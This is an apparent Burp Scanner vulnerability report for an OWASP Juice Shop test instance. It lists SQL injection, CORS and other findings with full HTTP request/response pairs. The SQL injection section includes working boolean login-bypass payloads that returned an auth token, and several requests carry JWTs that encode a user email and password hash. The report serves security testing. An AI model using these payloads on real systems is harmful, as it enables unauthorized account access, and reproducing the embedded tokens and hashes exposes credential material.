Juice Shop Burp Scanner Report

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

                    Confidence
Severity       Certain   Firm   Tentative   Total
High                 5      2           2       9
Medium               1      0           1       2
Low                  8      1           0       9
Information        199      2           0     201

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

[Chart: number of issues (axis 0 to 200) per severity: High, Medium, Low, Information]

Contents

1. SQL injection

1.1. http://192.168.61.143:3000/rest/product/search [q parameter]

1.2. http://192.168.61.143:3000/rest/user/login [email JSON parameter]

2. Cross-origin resource sharing: arbitrary origin trusted

2.1. http://192.168.61.143:3000/socket.io/

2.2. http://192.168.61.143:3000/

2.3. http://192.168.61.143:3000/api/BasketItems/

2.4. http://192.168.61.143:3000/api/BasketItems/7

2.5. http://192.168.61.143:3000/api/BasketItems/8

2.6. http://192.168.61.143:3000/api/Complaints/

2.7. http://192.168.61.143:3000/api/Feedbacks/

2.8. http://192.168.61.143:3000/api/Products/1

2.9. http://192.168.61.143:3000/api/Products/18

2.10. http://192.168.61.143:3000/api/Products/2

2.11. http://192.168.61.143:3000/api/Products/6

2.12. http://192.168.61.143:3000/api/Products/8

2.13. http://192.168.61.143:3000/api/Users/

2.14. http://192.168.61.143:3000/bower_components/angular-animate/angular-animate.min.js

2.15. http://192.168.61.143:3000/bower_components/angular-base64/angular-base64.js

2.16. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

2.17. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap.min.js

2.18. http://192.168.61.143:3000/bower_components/angular-cookies/angular-cookies.min.js

2.19. http://192.168.61.143:3000/bower_components/angular-qrcode/angular-qrcode.js

2.20. http://192.168.61.143:3000/bower_components/angular-route/angular-route.min.js

2.21. http://192.168.61.143:3000/bower_components/angular-socket-io/socket.min.js

2.22. http://192.168.61.143:3000/bower_components/angular-touch/angular-touch.min.js

2.23. http://192.168.61.143:3000/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

2.24. http://192.168.61.143:3000/bower_components/angular-translate/angular-translate.min.js

2.25. http://192.168.61.143:3000/bower_components/angular/angular.min.js

2.26. http://192.168.61.143:3000/bower_components/bootstrap/dist/js/bootstrap.min.js

2.27. http://192.168.61.143:3000/bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

2.28. http://192.168.61.143:3000/bower_components/clipboard/dist/clipboard.min.js

2.29. http://192.168.61.143:3000/bower_components/jquery/dist/jquery.min.js

2.30. http://192.168.61.143:3000/bower_components/moment/min/moment.min.js

2.31. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload-shim.min.js

2.32. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload.min.js

2.33. http://192.168.61.143:3000/bower_components/ngclipboard/dist/ngclipboard.min.js

2.34. http://192.168.61.143:3000/bower_components/qrcode-generator/js/qrcode.js

2.35. http://192.168.61.143:3000/bower_components/underscore/underscore.js

2.36. http://192.168.61.143:3000/css/app.css

2.37. http://192.168.61.143:3000/dist/juice-shop.min.js

2.38. http://192.168.61.143:3000/i18n/en.json

2.39. http://192.168.61.143:3000/i18n/en_US.json

2.40. http://192.168.61.143:3000/public/images/JuiceShop_Logo.svg

2.41. http://192.168.61.143:3000/public/images/products/%7B%7Bproduct.image%7D%7D

2.42. http://192.168.61.143:3000/public/images/products/bower_components/angular-animate/angular-animate.min.js

2.43. http://192.168.61.143:3000/public/images/products/bower_components/angular-base64/angular-base64.js

2.44. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

2.45. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

2.46. http://192.168.61.143:3000/public/images/products/bower_components/angular-cookies/angular-cookies.min.js

2.47. http://192.168.61.143:3000/public/images/products/bower_components/angular-qrcode/angular-qrcode.js

2.48. http://192.168.61.143:3000/public/images/products/bower_components/angular-route/angular-route.min.js

2.49. http://192.168.61.143:3000/public/images/products/bower_components/angular-socket-io/socket.min.js

2.50. http://192.168.61.143:3000/public/images/products/bower_components/angular-touch/angular-touch.min.js

2.51. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

2.52. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate/angular-translate.min.js

2.53. http://192.168.61.143:3000/public/images/products/bower_components/angular/angular.min.js

2.54. http://192.168.61.143:3000/public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

2.55. http://192.168.61.143:3000/public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

2.56. http://192.168.61.143:3000/public/images/products/bower_components/clipboard/dist/clipboard.min.js

2.57. http://192.168.61.143:3000/public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

2.58. http://192.168.61.143:3000/public/images/products/bower_components/fontawesome/css/font-awesome.min.css

2.59. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

2.60. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

2.61. http://192.168.61.143:3000/public/images/products/bower_components/jquery/dist/jquery.min.js

2.62. http://192.168.61.143:3000/public/images/products/bower_components/moment/min/moment.min.js

2.63. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

2.64. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

2.65. http://192.168.61.143:3000/public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

2.66. http://192.168.61.143:3000/public/images/products/bower_components/qrcode-generator/js/qrcode.js

2.67. http://192.168.61.143:3000/public/images/products/bower_components/string/dist/string.min.js

2.68. http://192.168.61.143:3000/public/images/products/bower_components/underscore/underscore.js

2.69. http://192.168.61.143:3000/public/images/products/css/app.css

2.70. http://192.168.61.143:3000/public/images/products/dist/juice-shop.min.js

2.71. http://192.168.61.143:3000/redirect

2.72. http://192.168.61.143:3000/rest/admin/application-version

2.73. http://192.168.61.143:3000/rest/basket/4

2.74. http://192.168.61.143:3000/rest/basket/4/checkout

2.75. http://192.168.61.143:3000/rest/product/search

2.76. http://192.168.61.143:3000/rest/user/login

2.77. http://192.168.61.143:3000/rest/user/whoami

3. Cleartext submission of password

3.1. http://192.168.61.143:3000/dist/juice-shop.min.js

3.2. http://192.168.61.143:3000/dist/juice-shop.min.js

3.3. http://192.168.61.143:3000/dist/juice-shop.min.js

4. Interesting input handling: SQLite injection

4.1. http://192.168.61.143:3000/rest/product/search [q parameter]

4.2. http://192.168.61.143:3000/rest/user/login [email JSON parameter]

5. Local File Include

6. Cross-site request forgery

7. The JavaScript file 'jquery.min.js' includes a vulnerable version of the library 'jquery'

8. Password submitted using GET method

8.1. http://192.168.61.143:3000/dist/juice-shop.min.js

8.2. http://192.168.61.143:3000/dist/juice-shop.min.js

8.3. http://192.168.61.143:3000/dist/juice-shop.min.js

9. Open redirection

10. Password field with autocomplete enabled

10.1. http://192.168.61.143:3000/dist/juice-shop.min.js

10.2. http://192.168.61.143:3000/dist/juice-shop.min.js

10.3. http://192.168.61.143:3000/dist/juice-shop.min.js

11. Content type incorrectly stated

12. Unencrypted communications

13. Cross-site scripting (stored)

14. Cross-site scripting (reflected)

14.1. http://192.168.61.143:3000/api/BasketItems/ [BasketId JSON parameter]

14.2. http://192.168.61.143:3000/api/BasketItems/ [ProductId JSON parameter]

14.3. http://192.168.61.143:3000/api/BasketItems/ [quantity JSON parameter]

14.4. http://192.168.61.143:3000/api/BasketItems/ [request body]

14.5. http://192.168.61.143:3000/api/Complaints/ [UserId JSON parameter]

14.6. http://192.168.61.143:3000/api/Complaints/ [message JSON parameter]

14.7. http://192.168.61.143:3000/api/Complaints/ [request body]

14.8. http://192.168.61.143:3000/api/Feedbacks/ [UserId JSON parameter]

14.9. http://192.168.61.143:3000/api/Feedbacks/ [comment JSON parameter]

14.10. http://192.168.61.143:3000/api/Feedbacks/ [name of an arbitrarily supplied URL parameter]

14.11. http://192.168.61.143:3000/api/Feedbacks/ [rating JSON parameter]

14.12. http://192.168.61.143:3000/api/Feedbacks/ [request body]

14.13. http://192.168.61.143:3000/api/Users/ [email JSON parameter]

14.14. http://192.168.61.143:3000/api/Users/ [request body]

14.15. http://192.168.61.143:3000/rest/user/login [request body]

15. Cross-origin resource sharing

15.1. http://192.168.61.143:3000/

15.2. http://192.168.61.143:3000/api/BasketItems/

15.3. http://192.168.61.143:3000/api/BasketItems/7

15.4. http://192.168.61.143:3000/api/BasketItems/8

15.5. http://192.168.61.143:3000/api/Complaints/

15.6. http://192.168.61.143:3000/api/Feedbacks/

15.7. http://192.168.61.143:3000/api/Products/1

15.8. http://192.168.61.143:3000/api/Products/12

15.9. http://192.168.61.143:3000/api/Products/18

15.10. http://192.168.61.143:3000/api/Products/2

15.11. http://192.168.61.143:3000/api/Products/4

15.12. http://192.168.61.143:3000/api/Products/6

15.13. http://192.168.61.143:3000/api/Products/7

15.14. http://192.168.61.143:3000/api/Products/8

15.15. http://192.168.61.143:3000/api/Users/

15.16. http://192.168.61.143:3000/bower_components/angular-animate/angular-animate.min.js

15.17. http://192.168.61.143:3000/bower_components/angular-base64/angular-base64.js

15.18. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

15.19. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap.min.js

15.20. http://192.168.61.143:3000/bower_components/angular-cookies/angular-cookies.min.js

15.21. http://192.168.61.143:3000/bower_components/angular-qrcode/angular-qrcode.js

15.22. http://192.168.61.143:3000/bower_components/angular-route/angular-route.min.js

15.23. http://192.168.61.143:3000/bower_components/angular-socket-io/socket.min.js

15.24. http://192.168.61.143:3000/bower_components/angular-touch/angular-touch.min.js

15.25. http://192.168.61.143:3000/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

15.26. http://192.168.61.143:3000/bower_components/angular-translate/angular-translate.min.js

15.27. http://192.168.61.143:3000/bower_components/angular/angular.min.js

15.28. http://192.168.61.143:3000/bower_components/bootstrap/dist/js/bootstrap.min.js

15.29. http://192.168.61.143:3000/bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

15.30. http://192.168.61.143:3000/bower_components/clipboard/dist/clipboard.min.js

15.31. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/cn.svg

15.32. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/de.svg

15.33. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/ee.svg

15.34. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/es.svg

15.35. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/fi.svg

15.36. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/fr.svg

15.37. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/gr.svg

15.38. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/it.svg

15.39. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/jp.svg

15.40. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/lt.svg

15.41. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/lv.svg

15.42. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/nl.svg

15.43. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/pl.svg

15.44. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/pt.svg

15.45. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/ru.svg

15.46. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/se.svg

15.47. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/tr.svg

15.48. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/us.svg

15.49. http://192.168.61.143:3000/bower_components/jquery/dist/jquery.min.js

15.50. http://192.168.61.143:3000/bower_components/moment/min/moment.min.js

15.51. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload-shim.min.js

15.52. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload.min.js

15.53. http://192.168.61.143:3000/bower_components/ngclipboard/dist/ngclipboard.min.js

15.54. http://192.168.61.143:3000/bower_components/qrcode-generator/js/qrcode.js

15.55. http://192.168.61.143:3000/bower_components/underscore/underscore.js

15.56. http://192.168.61.143:3000/css/app.css

15.57. http://192.168.61.143:3000/dist/juice-shop.min.js

15.58. http://192.168.61.143:3000/i18n/en.json

15.59. http://192.168.61.143:3000/i18n/en_US.json

15.60. http://192.168.61.143:3000/public/images/JuiceShop_Logo.svg

15.61. http://192.168.61.143:3000/public/images/carousel/1.jpg

15.62. http://192.168.61.143:3000/public/images/carousel/2.jpg

15.63. http://192.168.61.143:3000/public/images/carousel/3.jpg

15.64. http://192.168.61.143:3000/public/images/carousel/4.jpg

15.65. http://192.168.61.143:3000/public/images/carousel/5.jpg

15.66. http://192.168.61.143:3000/public/images/carousel/6.jpg

15.67. http://192.168.61.143:3000/public/images/carousel/7.jpg

15.68. http://192.168.61.143:3000/public/images/products/%7B%7Bproduct.image%7D%7D

15.69. http://192.168.61.143:3000/public/images/products/bower_components/angular-animate/angular-animate.min.js

15.70. http://192.168.61.143:3000/public/images/products/bower_components/angular-base64/angular-base64.js

15.71. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

15.72. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

15.73. http://192.168.61.143:3000/public/images/products/bower_components/angular-cookies/angular-cookies.min.js

15.74. http://192.168.61.143:3000/public/images/products/bower_components/angular-qrcode/angular-qrcode.js

15.75. http://192.168.61.143:3000/public/images/products/bower_components/angular-route/angular-route.min.js

15.76. http://192.168.61.143:3000/public/images/products/bower_components/angular-socket-io/socket.min.js

15.77. http://192.168.61.143:3000/public/images/products/bower_components/angular-touch/angular-touch.min.js

15.78. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

15.79. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate/angular-translate.min.js

15.80. http://192.168.61.143:3000/public/images/products/bower_components/angular/angular.min.js

15.81. http://192.168.61.143:3000/public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

15.82. http://192.168.61.143:3000/public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

15.83. http://192.168.61.143:3000/public/images/products/bower_components/clipboard/dist/clipboard.min.js

15.84. http://192.168.61.143:3000/public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

15.85. http://192.168.61.143:3000/public/images/products/bower_components/fontawesome/css/font-awesome.min.css

15.86. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

15.87. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

15.88. http://192.168.61.143:3000/public/images/products/bower_components/jquery/dist/jquery.min.js

15.89. http://192.168.61.143:3000/public/images/products/bower_components/moment/min/moment.min.js

15.90. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

15.91. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

15.92. http://192.168.61.143:3000/public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

15.93. http://192.168.61.143:3000/public/images/products/bower_components/qrcode-generator/js/qrcode.js

15.94. http://192.168.61.143:3000/public/images/products/bower_components/string/dist/string.min.js

15.95. http://192.168.61.143:3000/public/images/products/bower_components/underscore/underscore.js

15.96. http://192.168.61.143:3000/public/images/products/css/app.css

15.97. http://192.168.61.143:3000/public/images/products/dist/juice-shop.min.js

15.98. http://192.168.61.143:3000/redirect

15.99. http://192.168.61.143:3000/rest/admin/application-version

15.100. http://192.168.61.143:3000/rest/basket/4

15.101. http://192.168.61.143:3000/rest/basket/4/checkout

15.102. http://192.168.61.143:3000/rest/product/search

15.103. http://192.168.61.143:3000/rest/user/login

15.104. http://192.168.61.143:3000/rest/user/whoami

15.105. http://192.168.61.143:3000/socket.io/

16. Cross-domain POST

17. Email addresses disclosed

18. Private IP addresses disclosed

19. HTML does not specify charset


1. SQL injection

There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.


1.1. http://192.168.61.143:3000/rest/product/search [q parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://192.168.61.143:3000
Path:   /rest/product/search

Issue detail

The q parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the q parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /rest/product/search?q=orange' HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:13:44 GMT
Connection: close
Content-Length: 346

{
"error": {
"message": "SQLITE_ERROR: near \"'%'\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"'%'\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orange'%' OR description
...[SNIP]...

Request 2

GET /rest/product/search?q=orange'' HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 2

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:13:45 GMT
Connection: close

{"status":"success","data":[]}

1.2. http://192.168.61.143:3000/rest/user/login [email JSON parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://192.168.61.143:3000
Path:   /rest/user/login

Issue detail

The email JSON parameter appears to be vulnerable to SQL injection attacks. The payloads 33015061' or '4679'='4679 and 33015061' or '4679'='4680 were each submitted in the email JSON parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /rest/user/login HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 69
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.com33015061' or '4679'='4679","password":"juice-shop-password"}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 458
ETag: W/"1ca-rqbc38c6L97tDCWVSkY5Vg"
Date: Sun, 15 Jan 2017 21:14:01 GMT
Connection: close

{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDg0MSwiZXhwIjoxNDg0NTMyODQxfQ.-A7jaf5OMXCNhp1xNw8lUrQVM9iJ2BoXZCSZlvpErIc","bid":4,"umail":"mike_landeck@hotmail.com"}

Request 2

POST /rest/user/login HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 69
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"email":"mike_landeck@hotmail.com33015061' or '4679'='4680","password":"juice-shop-password"}

Response 2

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:01 GMT
Connection: close

Invalid email or password.

2. Cross-origin resource sharing: arbitrary origin trusted

There are 77 instances of this issue:

Issue background

An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.

If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers.


2.1. http://192.168.61.143:3000/socket.io/

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /socket.io/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://mvguwanmgqkd.com.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /socket.io/ HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://mvguwanmgqkd.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 400 Bad Request
Content-Type: application/json
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://mvguwanmgqkd.com
Date: Sun, 15 Jan 2017 21:22:43 GMT
Connection: close
Content-Length: 40

{"code":0,"message":"Transport unknown"}

2.2. http://192.168.61.143:3000/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://xoypxvnfrrwd.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET / HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: http://xoypxvnfrrwd.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
